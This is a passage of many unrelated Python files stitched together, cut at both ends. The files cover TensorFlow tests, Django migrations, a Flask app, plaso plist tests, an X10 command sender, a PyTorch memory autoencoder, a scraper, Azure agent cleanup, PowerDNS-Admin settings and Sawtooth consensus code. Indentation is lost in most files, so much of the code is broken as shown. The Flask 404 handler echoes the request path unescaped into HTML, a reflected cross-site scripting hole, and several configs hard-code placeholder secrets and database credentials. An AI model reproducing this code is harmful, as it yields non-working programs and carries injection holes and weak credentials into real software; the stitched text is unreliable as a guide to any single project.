logits = tf.matmul(x, tf.linalg.transpose(x))
y = snail.CausallyMaskedSoftmax(logits)
with self.test_session() as sess:
y_ = sess.run(y)
idx = np.triu_indices(num_rows, 1)
np.testing.assert_array_equal(y_[idx], 0.)
# Testing that each row sums to 1.
for i in range(num_rows):
np.testing.assert_almost_equal(np.sum(y_[i, :]), 1.0)
def test_AttentionBlock(self):
x = tf.random.normal((4, 10, 8))
y, end_points = snail.AttentionBlock(x, 3, 5)
self.assertEqual(y.shape, (4, 10, 5+8))
self.assertEqual(end_points['attn_prob'].shape, (4, 10, 10))
if __name__ == '__main__':
tf.test.main()
|
from django.urls import path
from contacts.views import Home
urlpatterns = [
path('', Home.as_view()),
]
|
from flask import Flask, request
app = Flask(__name__)
@app.route("/")
def index():
return "Hello, world!"
@app.errorhandler(404)
def page_not_found(e):
return "Not Found: " + request.path
|
import simuvex
######################################
# listen (but not really)
######################################
import logging
l = logging.getLogger("simuvex.procedures.libc.listen")
class listen(simuvex.SimProcedure):
#pylint:disable=arguments-differ
def run(self, sockfd, backlog): #pylint:disable=unused-argument
return self.state.se.Unconstrained('listen', self.state.arch.bits)
|
from table import String, Term, Concept
from connection import Connection
from collections import defaultdict
from itertools import chain
class Aggregator(object):
"""Example class of Aggregate queries using different UMLS tables"""
def __init__(self, dbname="umls", hostname="localhost", port=27017):
"""
Initialize an aggregator of different tables.
:param dbname: the name of the DB, default is UMLS
:param hostname: the name of the host, default is localhost
        :param port: the port on which your mongodb runs, default is 27017
:return: None
"""
self._connection = Connection(dbname, hostname, port)
self.string = String(self._connection)
self.term = Term(self._connection)
self.concept = Concept(self._connection)
def concepts_string(self, string):
"""
Get all concept objects given a string.
:param string: the string for which to search concepts
:return: a list of concepts.
"""
concepts = self.string.concept_id(string)
if not concepts:
return []
return list(self.concept.bunch(concepts))
def definitions(self, string):
"""
Get all definitions given a string.
:param string: the string for which to search definitions.
:return: a dictionary of concepts which contains the definition of that concept.
"""
string_obj = self.string.retrieve_one({"string": string}, {"_id": 1, "concept": 1})
if not string_obj:
return []
return self.concept.bunch_definitions(string_obj["concept"])
def definitions_terms(self, string):
"""
Get all definitions + preferred terms for a given string. Useful for creating concept representations.
:param string: the string for which to retrieve the concepts and preferred terms.
:return: a dictionary of concepts with the strings that refer to that concept.
"""
cids = self.string.concept_id(string)
return self.definitions_terms_cid(cids)
def definitions_terms_cid(self, cids, include_synonyms=(), include_term=True):
"""
Get all definitions from a cid.
:param cids: a list of cids
:param include_synonyms: The types of synonyms to include.
:param include_term: whether to use the preferred term.
:return: A list of definitions, grouped by concept.
"""
concepts = self.concept.bunch(cids, filt={"_id": 1, "definition": 1, "preferred": 1, "rel": 1})
output = defaultdict(set)
for c in concepts:
try:
output[c["_id"]].update(c["definition"])
except KeyError:
pass
if include_synonyms:
for syn in include_synonyms:
try:
synonyms = self.definitions_terms_cid(c["rel"][syn], include_term=include_term, include_synonyms=()).values()
output[c["_id"]].update(chain.from_iterable(synonyms))
except KeyError:
pass
if include_term:
term = self.term[c["preferred"]]
output[c["_id"]].update(self.string.surface(term["string"]))
output[c["_id"]] = list(output[c["_id"]])
return output
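# Illustrative usage sketch: assumes a running MongoDB instance that already holds
# the UMLS collections expected by Connection above; the query term "headache" is
# only an example.
if __name__ == "__main__":
    aggregator = Aggregator(dbname="umls", hostname="localhost", port=27017)
    for concept in aggregator.concepts_string("headache"):
        print(concept)
    print(aggregator.definitions("headache"))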
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the plist plugin interface."""
import unittest
from dfdatetime import posix_time as dfdatetime_posix_time
from plaso.containers import plist_event
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers.plist_plugins import interface
from tests.parsers.plist_plugins import test_lib
class MockPlugin(interface.PlistPlugin):
"""Mock plugin."""
NAME = 'mock_plist_plugin'
DATA_FORMAT = 'Test plist file'
PLIST_PATH = 'plist_binary'
PLIST_KEYS = frozenset(['DeviceCache', 'PairedDevices'])
# pylint: disable=arguments-differ
def GetEntries(self, parser_mediator, **unused_kwargs):
"""Extracts entries for testing.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
"""
event_data = plist_event.PlistTimeEventData()
event_data.key = 'LastInquiryUpdate'
event_data.root = '/DeviceCache/44-00-00-00-00-00'
date_time = dfdatetime_posix_time.PosixTimeInMicroseconds(
timestamp=1351827808261762)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
class TestPlistPlugin(test_lib.PlistPluginTestCase):
"""Tests for the plist plugin interface."""
# pylint: disable=protected-access
def setUp(self):
"""Makes preparations before running an individual test."""
self._top_level_dict = {
'DeviceCache': {
'44-00-00-00-00-04': {
'Name': 'Apple Magic Trackpad 2', 'LMPSubversion': 796,
'Services': '', 'BatteryPercent': 0.61},
'44-00-00-00-00-02': {
'Name': 'test-macpro', 'ClockOffset': 28180,
'PageScanPeriod': 2, 'PageScanRepetitionMode': 1}}}
def testGetKeys(self):
"""Tests the _GetKeys function."""
# Ensure the plugin only processes if both filename and keys exist.
plugin = MockPlugin()
# Match DeviceCache from the root level.
key = ['DeviceCache']
result = plugin._GetKeys(self._top_level_dict, key)
self.assertEqual(len(result), 1)
# Look for a key nested a layer beneath DeviceCache from root level.
# Note: overriding the default depth to look deeper.
key = ['44-00-00-00-00-02']
result = plugin._GetKeys(self._top_level_dict, key, depth=2)
self.assertEqual(len(result), 1)
# Check the value of the result was extracted as expected.
self.assertEqual(result[key[0]]['Name'], 'test-macpro')
def testProcess(self):
"""Tests the Process function."""
# Ensure the plugin only processes if both filename and keys exist.
plugin = MockPlugin()
# Test correct filename and keys.
top_level = {'DeviceCache': 1, 'PairedDevices': 1}
storage_writer = self._ParsePlistWithPlugin(
plugin, 'plist_binary', top_level)
self.assertEqual(storage_writer.number_of_events, 1)
self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
# Correct filename with odd filename cAsinG. Adding an extra useless key.
top_level = {'DeviceCache': 1, 'PairedDevices': 1, 'R@ndomExtraKey': 1}
storage_writer = self._ParsePlistWithPlugin(
plugin, 'pLiSt_BinAry', top_level)
self.assertEqual(storage_writer.number_of_events, 1)
self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
def testRecurseKey(self):
"""Tests the _RecurseKey function."""
plugin = MockPlugin()
# Ensure with a depth of 1 we only return the root key.
result = list(plugin._RecurseKey(self._top_level_dict, depth=1))
self.assertEqual(len(result), 1)
# Trying again with depth limit of 2 this time.
result = list(plugin._RecurseKey(self._top_level_dict, depth=2))
self.assertEqual(len(result), 3)
    # A depth of two should give us root plus the two devices. Let's check.
my_keys = []
for unused_root, key, unused_value in result:
my_keys.append(key)
expected = {'DeviceCache', '44-00-00-00-00-04', '44-00-00-00-00-02'}
self.assertTrue(expected == set(my_keys))
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 3.0.2 on 2020-11-26 04:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('puzzles', '0012_auto_20201111_0130'),
]
operations = [
migrations.AddField(
model_name='puzzle',
name='slack_channel_id',
field=models.CharField(default='', editable=False, max_length=30),
),
]
|
import argparse
parser = argparse.ArgumentParser(description="This program is a test of argparse.")
parser.add_argument('--number')
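# Quick demonstration of the parser above: parse an explicit argument list instead
# of sys.argv so the snippet also runs non-interactively.
args = parser.parse_args(['--number', '42'])
print(args.number)  # prints '42'; argparse keeps values as strings unless type= is given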
|
SECRET_KEY = 'dev'
SITES_DICT = {
'www.iie.cas.cn': 'xgs',
'www.is.cas.cn': 'rjs',
}
###############################################
MYSQL_HOST = 'localhost'
MYSQL_PORT = 6761
MYSQL_DB_NAME = 'crawling_db'
MYSQL_USER = 'root'
MYSQL_PASSWORD = 'mysql'
###############################################
SCRAPY_PATH = '../ScrapyBased/'
|
"""Send an X10 command."""
from ...constants import ResponseStatus, X10Commands, X10CommandType
from ...topics import X10_SEND
from ...x10_address import X10Address
from .. import ack_handler, nak_handler
from ..outbound_base import OutboundHandlerBase
class X10CommandSend(OutboundHandlerBase):
"""Send an X10 command."""
def __init__(self, address, x10_cmd: X10Commands):
"""Send an X10 command."""
super().__init__(topic=X10_SEND)
self._address = X10Address(address)
self._cmd = x10_cmd
# pylint: disable=arguments-differ
async def async_send(self):
"""Send the command."""
if self._cmd in [
X10Commands.ALL_LIGHTS_OFF,
X10Commands.ALL_LIGHTS_ON,
X10Commands.ALL_UNITS_OFF,
]:
cmd_int = int(self._cmd)
raw_x10 = (self._address.housecode_byte << 4) + cmd_int
return await super().async_send(
raw_x10=raw_x10, x10_flag=X10CommandType.COMMAND
)
raw_x10 = bytes(self._address)
uc_result = await super().async_send(
raw_x10=raw_x10, x10_flag=X10CommandType.UNITCODE
)
if uc_result != ResponseStatus.SUCCESS:
return uc_result
cmd_int = int(self._cmd)
raw_x10 = (self._address.housecode_byte << 4) + cmd_int
return await super().async_send(
raw_x10=raw_x10, x10_flag=X10CommandType.COMMAND
)
@ack_handler
def handle_ack(self, raw_x10, x10_flag):
"""Handle the X10 message ACK."""
super().handle_ack()
@nak_handler
def handle_nak(self, raw_x10, x10_flag):
"""Handle the X10 message NAK.
If the message NAKs it is likely the modem does not support X10 messages.
The device will try to send the X10 message 3 times to ensure it is not a
modem ready issue.
This handler ensures the modem does not try to resend the message constantly.
"""
|
import csv
with open('names.csv', 'r') as csv_file:
csv_reader = csv.reader(csv_file)
# to read contents of csv file as dictionary rather than list use this
# csv_reader = csv.DictReader(csv_file)
    # csv_reader is an iterator object that yields each row of the file
    # to see the rows of the csv reader as lists we can do this
# for line in csv_reader:
# print(line)
# to skip first line which contains field headers
# next(csv_reader)
with open('new_names.csv', 'w') as new_file:
csv_writer = csv.writer(new_file, delimiter='\t')
        # the following code can be used to write to csv files as dictionaries
# field_names = ['first_name','second_name','email']
# csv_writer=csv.DictWriter(new_file,fieldnames=field_names,delimiter="\t")
# to write field headers in csv file following line can be added
# csv_writer.writeheader()
for line in csv_reader:
csv_writer.writerow(line)
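# Companion sketch for the commented-out dictionary approach above: the same copy,
# but reading and writing rows as dicts. Assumes names.csv has the header
# first_name,second_name,email suggested by the comments, and writes to a separate
# new_names_dict.csv so the tab-delimited copy above is left untouched.
with open('names.csv', 'r') as csv_file:
    csv_reader = csv.DictReader(csv_file)
    with open('new_names_dict.csv', 'w', newline='') as new_file:
        field_names = ['first_name', 'second_name', 'email']
        csv_writer = csv.DictWriter(new_file, fieldnames=field_names, delimiter='\t')
        csv_writer.writeheader()
        for line in csv_reader:
            csv_writer.writerow(line)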
|
from functools import reduce
from operator import mul
from typing import Tuple
import torch
import torch.nn as nn
from models.base import BaseModule
from models.blocks_2d import DownsampleBlock
from models.blocks_2d import UpsampleBlock
from models.estimator import Estimator
from models.memory import MemModule
from itertools import chain
class Encoder(BaseModule):
"""
MNIST model encoder.
"""
def __init__(self, input_shape, code_length):
# type: (Tuple[int, int, int], int) -> None
"""
Class constructor:
:param input_shape: the shape of MNIST samples.
:param code_length: the dimensionality of latent vectors.
"""
super(Encoder, self).__init__()
self.input_shape = input_shape
self.code_length = code_length
c, h, w = input_shape
activation_fn = nn.LeakyReLU()
# Convolutional network
self.conv = nn.Sequential(
DownsampleBlock(channel_in=c, channel_out=32, activation_fn=activation_fn),
DownsampleBlock(channel_in=32, channel_out=64, activation_fn=activation_fn),
)
self.deepest_shape = (64, h // 4, w // 4)
# FC network
self.fc = nn.Sequential(
nn.Linear(in_features=reduce(mul, self.deepest_shape), out_features=64),
nn.BatchNorm1d(num_features=64),
activation_fn,
nn.Linear(in_features=64, out_features=code_length),
nn.Sigmoid()
)
def forward(self, x):
        # type: (torch.Tensor) -> torch.Tensor
"""
Forward propagation.
:param x: the input batch of images.
:return: the batch of latent vectors.
"""
h = x
h = self.conv(h)
h = h.view(len(h), -1)
o = self.fc(h)
return o
class Decoder(BaseModule):
"""
MNIST model decoder.
"""
def __init__(self, code_length, deepest_shape, output_shape):
# type: (int, Tuple[int, int, int], Tuple[int, int, int]) -> None
"""
Class constructor.
:param code_length: the dimensionality of latent vectors.
:param deepest_shape: the dimensionality of the encoder's deepest convolutional map.
:param output_shape: the shape of MNIST samples.
"""
super(Decoder, self).__init__()
self.code_length = code_length
self.deepest_shape = deepest_shape
self.output_shape = output_shape
activation_fn = nn.LeakyReLU()
# FC network
self.fc = nn.Sequential(
nn.Linear(in_features=code_length, out_features=64),
nn.BatchNorm1d(num_features=64),
activation_fn,
nn.Linear(in_features=64, out_features=reduce(mul, deepest_shape)),
nn.BatchNorm1d(num_features=reduce(mul, deepest_shape)),
activation_fn
)
# Convolutional network
self.conv = nn.Sequential(
UpsampleBlock(channel_in=64, channel_out=32, activation_fn=activation_fn),
UpsampleBlock(channel_in=32, channel_out=16, activation_fn=activation_fn),
nn.Conv2d(in_channels=16, out_channels=1, kernel_size=1, bias=False)
)
def forward(self, x):
        # type: (torch.Tensor) -> torch.Tensor
"""
Forward propagation.
:param x: the batch of latent vectors.
:return: the batch of reconstructions.
"""
h = x
h = self.fc(h)
h = h.view(len(h), *self.deepest_shape)
h = self.conv(h)
o = h
return o
class MEMMNIST(BaseModule):
"""
LSA model for MNIST one-class classification.
"""
    def __init__(self, input_shape, code_length, cpd_channels, mem_dim, shrink_thres=0.0025):
        # type: (Tuple[int, int, int], int, int, int, float) -> None
        """
        Class constructor.
        :param input_shape: the shape of MNIST samples.
        :param code_length: the dimensionality of latent vectors.
        :param cpd_channels: number of bins in which the multinomial works.
        :param mem_dim: the number of slots in the memory module.
        :param shrink_thres: the hard-shrinkage threshold applied to the memory attention weights.
        """
super(MEMMNIST, self).__init__()
self.input_shape = input_shape
self.code_length = code_length
self.cpd_channels = cpd_channels
# Build encoder
self.encoder = Encoder(
input_shape=input_shape,
code_length=code_length
)
# Build decoder
self.decoder = Decoder(
code_length=code_length,
deepest_shape=self.encoder.deepest_shape,
output_shape=input_shape
)
# Build estimator
self.estimator = Estimator(
code_length=code_length,
fm_list=[32, 32, 32, 32],
cpd_channels=cpd_channels
)
        self.mem_rep = MemModule(mem_dim=mem_dim, fea_dim=code_length, shrink_thres=shrink_thres)
def close_grad(self):
for param in self.encoder.parameters():
param.requires_grad = False
for param in self.estimator.parameters():
param.requires_grad = False
print("model need not grad")
def get_parameters(self):
return chain(self.decoder.parameters(), self.mem_rep.parameters())
def forward(self, x):
        # type: (torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]
        """
        Forward propagation.
        :param x: the input batch of images.
        :return: a tuple of torch.Tensors holding reconstructions, latent vectors, CPD estimates and memory attention weights.
"""
h = x
# Produce representations
z = self.encoder(h)
# Estimate CPDs with autoregression
z_dist = self.estimator(z)
# B * C -> B*C*1*1
res_mem = self.mem_rep(z.view(z.size(0), z.size(1), 1, 1))
z_hat = res_mem['output']
att = res_mem['att']
z_hat = z_hat.view(z.size(0), z.size(1))
# Reconstruct x
x_r = self.decoder(z_hat)
x_r = x_r.view(-1, *self.input_shape)
return x_r, z, z_dist, att
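# Illustrative usage sketch (not part of the original module), assuming the surrounding
# models package is importable: build a MEMMNIST model for 1x28x28 inputs and run a
# forward pass on a random batch. The hyper-parameter values below are placeholders.
if __name__ == '__main__':
    model = MEMMNIST(input_shape=(1, 28, 28), code_length=64, cpd_channels=100, mem_dim=100)
    model.eval()  # put BatchNorm layers in inference mode
    with torch.no_grad():
        x = torch.rand(8, 1, 28, 28)
        x_r, z, z_dist, att = model(x)
    print(x_r.shape, z.shape, z_dist.shape, att.shape)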
|
from scrapper import *
# from process import *
import argparse
import json
def scrapPages(pages, keepTags=True):
with open("../data/sources.json", "r") as f:
visited = json.load(f)
visited_urls = [r["url"] for r in visited]
    try:
        with open("scrapped_data.json", "r") as json_file:
            old_data = json.load(json_file)
    except (FileNotFoundError, json.JSONDecodeError):
        old_data = []
for pg in pages:
try:
if not (pg["url"] in visited_urls):
print("Starting to scrap", pg["url"])
data = scrap(pg["url"], testing=False, headless=True)
print("Finished scrapping page")
# quotes = process(data, names_list=pg["ppl"])
old_data += data
visited.append(pg)
else:
print("Already visited", pg["url"], ". Please call rescrap instead.")
except Exception as e:
print(e)
print("Omitting this url...")
with open("scrapped_data.json", "w+") as f:
json.dump(old_data, f, indent=4)
with open("../data/sources.json", "w+") as f:
json.dump(visited, f, indent=4)
def rescrap(pages, keepTags=True):
with open("../data/sources.json", "r") as f:
visited = json.load(f)
visited_urls = [r["url"] for r in visited]
for pg in pages:
if pg["url"] in visited_urls:
idx = visited_urls.index(pg["url"])
visited.pop(idx)
visited_urls.pop(idx)
with open("../data/sources.json", "w") as f:
json.dump(visited, f, indent=4)
with open("quotes.json", "r") as f:
quotes = json.load(f)
quotes = list(
filter(lambda q: not any(q["url"] == pg["url"] for pg in pages), quotes)
)
with open("quotes.json", "w") as f:
json.dump(quotes, f, indent=4)
scrapPages(pages, keepTags)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Scrap quotes from a tumblr page.")
parser.add_argument(
"path",
nargs=1,
help='path to json of list of quotes. The schema is\n...[{"url":...,"ppl":[...]}]\nThe ppl is list of characters\' names and can be empty.',
)
parser.add_argument(
"-t",
"--keepTags",
dest="keepTags",
action="store_true",
help="boolean to indicate whether you want to keep the tags of the original post (add this to set to True, add -np / --no-keepTags to set to False)",
)
parser.add_argument(
"-nt", "--no-keepTags", "--no-p", dest="keepTags", action="store_false"
)
parser.set_defaults(keepTags=True)
args = parser.parse_args()
print("arguments: " + str(args))
with open(args.path[0], "r") as f:
jsn = json.loads(f.read())
scrapPages(jsn, args.keepTags)
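# Illustrative sketch (not part of the original script, kept commented out so it never runs):
# building an input file that matches the schema described in the --help text above.
# The URLs and names are placeholders.
#
# example_pages = [
#     {"url": "https://example.tumblr.com/post/123", "ppl": ["Alice", "Bob"]},
#     {"url": "https://example.tumblr.com/post/456", "ppl": []},
# ]
# with open("pages.json", "w") as f:
#     json.dump(example_pages, f, indent=4)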
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.event import add_event, WALAEventOperation
from azurelinuxagent.common.utils.restutil import KNOWN_WIRESERVER_IP
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
# Name for Metadata Server Protocol
_METADATA_PROTOCOL_NAME = "MetadataProtocol"
# MetadataServer Certificates for Cleanup
_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME = "V2TransportPrivate.pem"
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME = "V2TransportCert.pem"
_LEGACY_METADATA_SERVER_P7B_FILE_NAME = "Certificates.p7b"
# MetadataServer Endpoint
_KNOWN_METADATASERVER_IP = "169.254.169.254"
def is_metadata_server_artifact_present():
metadata_artifact_path = os.path.join(conf.get_lib_dir(), _LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME)
return os.path.isfile(metadata_artifact_path)
def cleanup_metadata_server_artifacts(osutil):
logger.info("Clean up for MetadataServer to WireServer protocol migration: removing MetadataServer certificates and resetting firewall rules.")
_cleanup_metadata_protocol_certificates()
_reset_firewall_rules(osutil)
def _cleanup_metadata_protocol_certificates():
"""
Removes MetadataServer Certificates.
"""
lib_directory = conf.get_lib_dir()
_ensure_file_removed(lib_directory, _LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME)
_ensure_file_removed(lib_directory, _LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME)
_ensure_file_removed(lib_directory, _LEGACY_METADATA_SERVER_P7B_FILE_NAME)
def _reset_firewall_rules(osutil):
"""
Removes MetadataServer firewall rule so IMDS can be used. Enables
WireServer firewall rule based on if firewall is configured to be on.
"""
osutil.remove_firewall(dst_ip=_KNOWN_METADATASERVER_IP, uid=os.getuid(), wait=osutil.get_firewall_will_wait())
if conf.enable_firewall():
success, _ = osutil.enable_firewall(dst_ip=KNOWN_WIRESERVER_IP, uid=os.getuid())
add_event(
AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.Firewall,
is_success=success,
log_event=False)
def _ensure_file_removed(directory, file_name):
"""
Removes files if they are present.
"""
path = os.path.join(directory, file_name)
if os.path.isfile(path):
os.remove(path)
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
# BASIC APP CONFIG
WTF_CSRF_ENABLED = True
SECRET_KEY = 'changeme'
LOG_LEVEL = 'DEBUG'
LOG_FILE = 'logs/log.txt'
# TIMEOUT - for large zones
TIMEOUT = 10
# UPLOAD DIR
UPLOAD_DIR = os.path.join(basedir, 'upload')
# DATABASE CONFIG FOR MYSQL
DB_HOST = os.environ.get('PDA_DB_HOST')
DB_NAME = os.environ.get('PDA_DB_NAME')
DB_USER = os.environ.get('PDA_DB_USER')
DB_PASSWORD = os.environ.get('PDA_DB_PASSWORD')
#MySQL
SQLALCHEMY_DATABASE_URI = 'mysql://'+DB_USER+':'+DB_PASSWORD+'@'+DB_HOST+'/'+DB_NAME
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
SQLALCHEMY_TRACK_MODIFICATIONS = True
# SAML Authentication
SAML_ENABLED = False
SAML_DEBUG = True
SAML_PATH = os.path.join(os.path.dirname(__file__), 'saml')
##Example for ADFS Metadata-URL
SAML_METADATA_URL = 'https://<hostname>/FederationMetadata/2007-06/FederationMetadata.xml'
#Cache Lifetime in Seconds
SAML_METADATA_CACHE_LIFETIME = 1
# SAML SSO binding format to use
## Default: library default (urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect)
#SAML_IDP_SSO_BINDING = 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST'
## EntityID of the IdP to use. Only needed if more than one IdP is
## in the SAML_METADATA_URL
### Default: First (only) IdP in the SAML_METADATA_URL
### Example: https://idp.example.edu/idp
#SAML_IDP_ENTITY_ID = 'https://idp.example.edu/idp'
## NameID format to request
### Default: The SAML NameID Format in the metadata if present,
### otherwise urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified
### Example: urn:oid:0.9.2342.19200300.100.1.1
#SAML_NAMEID_FORMAT = 'urn:oid:0.9.2342.19200300.100.1.1'
## Attribute to use for Email address
### Default: email
### Example: urn:oid:0.9.2342.19200300.100.1.3
#SAML_ATTRIBUTE_EMAIL = 'urn:oid:0.9.2342.19200300.100.1.3'
## Attribute to use for Given name
### Default: givenname
### Example: urn:oid:2.5.4.42
#SAML_ATTRIBUTE_GIVENNAME = 'urn:oid:2.5.4.42'
## Attribute to use for Surname
### Default: surname
### Example: urn:oid:2.5.4.4
#SAML_ATTRIBUTE_SURNAME = 'urn:oid:2.5.4.4'
## Attribute to use for username
### Default: Use NameID instead
### Example: urn:oid:0.9.2342.19200300.100.1.1
#SAML_ATTRIBUTE_USERNAME = 'urn:oid:0.9.2342.19200300.100.1.1'
## Attribute to get admin status from
### Default: Don't control admin with SAML attribute
### Example: https://example.edu/pdns-admin
### If set, look for the value 'true' to set a user as an administrator
### If not included in assertion, or set to something other than 'true',
### the user is set as a non-administrator user.
#SAML_ATTRIBUTE_ADMIN = 'https://example.edu/pdns-admin'
## Attribute to get account names from
### Default: Don't control accounts with SAML attribute
### If set, the user will be added and removed from accounts to match
### what's in the login assertion. Accounts that don't exist will
### be created and the user added to them.
SAML_ATTRIBUTE_ACCOUNT = 'https://example.edu/pdns-account'
SAML_SP_ENTITY_ID = 'http://<SAML SP Entity ID>'
SAML_SP_CONTACT_NAME = '<contact name>'
SAML_SP_CONTACT_MAIL = '<contact mail>'
#Configures if SAML tokens should be encrypted.
#If enabled a new app certificate will be generated on restart
SAML_SIGN_REQUEST = False
#Use the SAML standard logout mechanism retrieved from the IdP metadata.
#If set to False, the SAML session is ignored on logout:
#log out from PowerDNS-Admin only and keep the SAML session authenticated.
SAML_LOGOUT = False
#Configure to redirect to a different URL than the PowerDNS-Admin login page after SAML logout,
#for example redirect to google.com after a successful SAML logout
#SAML_LOGOUT_URL = 'https://google.com'
|
import unittest
from nemex import Entity
class TestEntity(unittest.TestCase):
def setUp(self) -> None:
# TODO: Setup test.
self.entity = Entity(0, "")
return None
def test_example(self):
return self.assertEqual("", "")
def tearDown(self) -> None:
return None
if __name__ == '__main__':
unittest.main()
|
class Provider:
"""Superclass for provider plugins"""
DEFAULT_OP_ARGS = {}
@classmethod
def get_default_op_args(cls, processor):
return cls.DEFAULT_OP_ARGS.get(processor, dict())
class TinkerGraph(Provider): # TODO
"""Default provider"""
@staticmethod
def get_hashable_id(val):
return val
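# Illustrative sketch (not part of the original module): concrete providers override
# DEFAULT_OP_ARGS to supply per-processor defaults; unknown processors fall back to {}.
# The processor name and option key below are placeholders.
class ExampleProvider(Provider):
    DEFAULT_OP_ARGS = {'example_processor': {'timeout_ms': 30000}}
# ExampleProvider.get_default_op_args('example_processor')  -> {'timeout_ms': 30000}
# ExampleProvider.get_default_op_args('anything_else')      -> {}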
|
def brightnessApp(display, utime, ujson, bluetooth, startNewThread, playBuzzer, loadJSON, saveJSON, showControls, update, clear):
run = True
settings = loadJSON("settings.json")
display.set_backlight(settings["brightness"])
displayBrightness = int(settings["brightness"] * 10)
while run:
clear()
#Draw the app
showControls(display.get_width(), display.get_height(), "", "<-", "+", "-")
display.text("Helderheid: " + str(displayBrightness), 20 , 60, 500, 3)
#App Controls
buttonPressed = False
while display.is_pressed(display.BUTTON_X):
if not buttonPressed and displayBrightness < 10:
startNewThread(playBuzzer)
displayBrightness += 1
display.set_backlight(displayBrightness/10)
settings["brightness"] = displayBrightness/10
buttonPressed = True
while display.is_pressed(display.BUTTON_Y):
if not buttonPressed and displayBrightness > 1:
startNewThread(playBuzzer)
displayBrightness -= 1
display.set_backlight(displayBrightness/10)
settings["brightness"] = displayBrightness/10
buttonPressed = True
while display.is_pressed(display.BUTTON_A):
pass
        while display.is_pressed(display.BUTTON_B):
            # B exits the app: save the settings and stop the main loop
            if not buttonPressed:
                startNewThread(playBuzzer)
                run = False
                saveJSON("settings.json", settings)
                buttonPressed = True
buttonPressed = False
update()
|
# 15/06/2017
import re
def condense(text):
    """Collapse an immediately repeated word ("word word") into a single occurrence."""
    return re.sub(r"(\w+)\s\1", r"\1", text)
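# Quick illustration of the behaviour (not part of the original snippet):
if __name__ == "__main__":
    print(condense("the the quick brown fox fox"))  # -> "the quick brown fox"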
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-02-19 03:07
from __future__ import unicode_literals
from django.db import migrations
from usaspending_api.common.helpers.generic_helper import CORRECTED_CGAC_PG_FUNCTION_DEF
from usaspending_api.common.helpers.generic_helper import REV_CORRECTED_CGAC_PG_FUNCTION_DEF
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.RunSQL(sql=CORRECTED_CGAC_PG_FUNCTION_DEF,
reverse_sql=REV_CORRECTED_CGAC_PG_FUNCTION_DEF),
]
|
# Copyright 2019 NTRLab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# pylint: disable=inconsistent-return-statements
import time
import random
import hashlib
import logging
from sawtooth_validator.journal.block_wrapper import BlockWrapper
from sawtooth_validator.journal.consensus.consensus \
import BlockPublisherInterface
from sawtooth_validator.journal.consensus.consensus \
import BlockVerifierInterface
from sawtooth_validator.journal.consensus.consensus \
import ForkResolverInterface
from sawtooth_validator.state.settings_view import SettingsView
# for proxy engine
from threading import Condition
LOGGER = logging.getLogger(__name__)
_CONSENSUS_NAME_ = None
_consensus_notifier = None
class BlockPublisher(BlockPublisherInterface):
"""DevMode consensus uses genesis utility to configure Min/MaxWaitTime
to determine when to claim a block.
Default MinWaitTime to zero and MaxWaitTime is 0 or unset,
ValidBlockPublishers default to None or an empty list.
DevMode Consensus (BlockPublisher) will read these settings
from the StateView when Constructed.
"""
def __init__(self,
block_cache,
state_view_factory,
batch_publisher,
data_dir,
config_dir,
validator_id):
super().__init__(
block_cache,
state_view_factory,
batch_publisher,
data_dir,
config_dir,
validator_id)
self._block_cache = block_cache
self._state_view_factory = state_view_factory
self._start_time = 0
self._wait_time = 0
# Set these to default values right now, when we asked to initialize
# a block, we will go ahead and check real configuration
self._min_wait_time = 0.01
self._max_wait_time = 0.06
        self._valid_block_publishers = None # list of validators that can participate in consensus
self._consensus = None
self._condition = Condition()
self._is_finalize_complete = None
def set_consensus_name(self,name):
self._consensus = bytes(name, 'utf-8')
LOGGER.debug("PROXY:set_consensus_name=%s->%s",name,self._consensus)
def set_publisher(self,publisher):
self._publisher = publisher
LOGGER.debug("PROXY:set_publisher=%s",publisher)
def initialize_block(self, block_header):
"""Do initialization necessary for the consensus to claim a block,
this may include initiating voting activates, starting proof of work
hash generation, or create a PoET wait timer.
Args:
block_header (BlockHeader): the BlockHeader to initialize.
Returns:
